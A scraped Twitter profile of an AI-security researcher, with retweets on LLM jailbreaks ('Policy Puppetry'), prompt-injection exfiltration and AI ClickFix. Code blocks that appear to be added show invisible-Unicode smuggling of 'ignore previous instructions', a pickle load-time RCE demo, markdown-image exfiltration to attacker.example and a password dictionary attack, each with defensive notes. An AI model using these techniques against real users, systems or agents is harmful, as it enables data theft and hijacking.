Andreas (@_tsamados) 's Twitter Profile
Andreas

@_tsamados

PhD researcher on human-machine teaming @UniofOxford

I like hacking LLMs, philosophy of science, cryptography, p2p networks, direct action

ID: 1530201115039608833

Link: https://custodians.online/ · Joined: 27-05-2022 14:55:59

78 Tweets

86 Followers

115 Following

threlfall (@whitehacksec) 's Twitter Profile Photo

wiki.offsecml.com has some shiny new things: Biagio Montaruli's adversarial phishing page generator; workarounds for TensorFlow and Keras model execution (thanks Mary Walker & faceteep); hidden Unicode attacks for LLMs (Joseph Thacker, Riley Goodside); vishing techniques
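The "hidden Unicode attacks" entry refers to a well-known smuggling trick that can be sketched in a few lines (my reconstruction, not the wiki's code): ASCII instructions are mapped into the invisible Unicode "tag" block (U+E0000–U+E007F), so the payload renders as nothing to a human reviewer but can survive into an LLM's input.

```python
# Sketch of invisible-Unicode payload smuggling: ASCII text is shifted into
# the Unicode tag block (U+E0000-U+E007F), which most renderers display as
# nothing at all, while the characters remain present in the string.

def hide(payload: str) -> str:
    """Encode ASCII text as invisible Unicode tag characters."""
    return "".join(chr(0xE0000 + ord(c)) for c in payload)

def reveal(text: str) -> str:
    """Recover any tag-encoded characters hidden in a string."""
    return "".join(
        chr(ord(c) - 0xE0000) for c in text if 0xE0000 <= ord(c) <= 0xE007F
    )

visible = "Here is a harmless-looking sentence."
smuggled = visible + hide("ignore previous instructions")

print(smuggled == visible)   # False, although the two look identical on screen
print(reveal(smuggled))      # -> ignore previous instructions
```

The corresponding defense is equally simple: strip or flag code points in the tag block (and other invisible ranges) before text ever reaches the model.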

Andreas (@_tsamados) 's Twitter Profile Photo

PSA: don't go mindlessly downloading miqu from the magnet link yet or you WILL be vulnerable to remote code execution attacks
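The RCE risk behind this PSA is generic to untrusted model files (this is an illustrative sketch, not specific to the miqu artifacts): many PyTorch-era checkpoints are pickle archives, and unpickling executes arbitrary callables via `__reduce__`.

```python
# Why "just loading a downloaded model" can mean code execution: pickle
# deserialization calls whatever callable __reduce__ returns. Here a harmless
# print() stands in for what would otherwise be os.system(...).
import pickle

class Malicious:
    def __reduce__(self):
        # On load, pickle calls this callable with these arguments.
        return (print, ("payload executed at load time",))

blob = pickle.dumps(Malicious())   # this is what you download
pickle.loads(blob)                 # "loading the model" runs the payload
```

Safer options include weights-only formats such as safetensors, or `torch.load(..., weights_only=True)`, which refuses to unpickle arbitrary objects.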

Brendan Dolan-Gavitt (@moyix) 's Twitter Profile Photo

Absolutely stunned by this: @XBOW went head to head against experienced pentesters (one with 20 years in the field!) and solved as many challenges as the best human (88/104, 85%). I thought this moment was years away.

Johann Rehberger (@wunderwuzzi23) 's Twitter Profile Photo

🚨Google AI Studio continues to struggle with data exfiltration vulnerabilities ⚠️ This demo shows silent data exfiltration of employee feedback and performance reviews through prompt injection in one of the feedback entries. The POC triggers data exfiltration via rendering
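The rendering-based exfiltration pattern described here can be sketched as follows (my reconstruction of the general technique, not Rehberger's PoC; the attacker URL is hypothetical): injected instructions make the model emit a markdown image whose query string carries the stolen text, and the client exfiltrates it simply by rendering the image.

```python
# Sketch of exfiltration-via-rendering: the model is tricked into emitting a
# markdown image pointing at an attacker server, with stolen data in the URL.
import re
from urllib.parse import quote

ATTACKER = "https://attacker.example/log"   # hypothetical collection endpoint

def exfil_markdown(stolen: str) -> str:
    """What the injected prompt asks the model to output."""
    return f"![img]({ATTACKER}?d={quote(stolen)})"

def strip_remote_images(model_output: str) -> str:
    """One common mitigation: refuse to render remote images at all."""
    return re.sub(r"!\[[^\]]*\]\(https?://[^)]*\)", "[image removed]", model_output)

payload = exfil_markdown("Q3 review: needs improvement")
print(payload)
print(strip_remote_images(payload))   # -> [image removed]
```

This is why chat frontends increasingly block or proxy remote image loads: the fix has to live in the renderer, since the model itself cannot be trusted not to emit such URLs.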

Stephen Wolfram (@stephen_wolfram) 's Twitter Profile Photo

What's really going on in machine learning? Just finished a deep dive using (new) minimal models. Seems like ML is basically about fitting together lumps of computational irreducibility ... with important potential implications for science of ML, and future tech...

XBOW (@xbow) 's Twitter Profile Photo

We are now making our validation benchmarks public! We invite you to test your skills or systems against them and share your results with us. Read more in our blog post: xbow.com/blog/benchmark…

Andreas (@_tsamados) 's Twitter Profile Photo

Are you using AI agents or LLMs for hacking or in your cybersecurity work? Going to 38c3? I would love to chat! I'll be at ccc all week for my research : ) DMs open

Katie Paxton-Fear (@insiderphd) 's Twitter Profile Photo

This is an IMPRESSIVELY good PDF password dictionary brute-forcer, got a password in literally milliseconds; if you're doing recon this is 👌 github.com/mufeedvh/pdfrip
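The core of a dictionary attack like pdfrip's can be sketched in a few lines (the real tool is Rust and far faster; `make_checker` here is a stand-in oracle — against a real PDF you would attempt to open the file with each candidate password instead):

```python
# Generic dictionary-attack loop: try each candidate password against an
# oracle until one succeeds. The oracle below stores only a hash, standing
# in for a password-protected document.
import hashlib

def make_checker(real_password: str):
    digest = hashlib.sha256(real_password.encode()).hexdigest()
    return lambda pw: hashlib.sha256(pw.encode()).hexdigest() == digest

def dictionary_attack(check, wordlist):
    for word in wordlist:
        if check(word):
            return word
    return None   # wordlist exhausted

check = make_checker("hunter2")
print(dictionary_attack(check, ["123456", "password", "hunter2", "qwerty"]))
# -> hunter2
```

With a common-passwords wordlist and a cheap per-attempt check, millisecond cracks like the one described above are entirely plausible.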

Tom Bonner (@thomas_bonner) 's Twitter Profile Photo

Announcing our latest attack technique, "Policy Puppetry" - a single, transferable prompt blending structured policy & roleplay that bypasses alignment in frontier AI models. Game-changing for red-teaming! #AI #GenAI #RedTeam #CyberSecurity hiddenlayer.com/innovation-hub…

Andreas (@_tsamados) 's Twitter Profile Photo

It's not just the AI models that are a security nightmare, it's the whole stack that comes with them (and that keeps changing)

Johann Rehberger (@wunderwuzzi23) 's Twitter Profile Photo

🔥 New blog post: AI ClickFix! Explores how classic ClickFix social engineering attacks can target AI agents, like Claude Computer-Use. Learn what ClickFix is, how it works in detail, and see a working proof-of-concept. Scary stuff. 👇

dreadnode (@dreadnode) 's Twitter Profile Photo

Introducing AIRTBench, an AI red teaming benchmark for evaluating language models’ ability to autonomously discover and exploit AI/ML security vulnerabilities.

Read the paper on arXiv: arxiv.org/abs/2506.14682

Open-source dataset and benchmark eval code repo: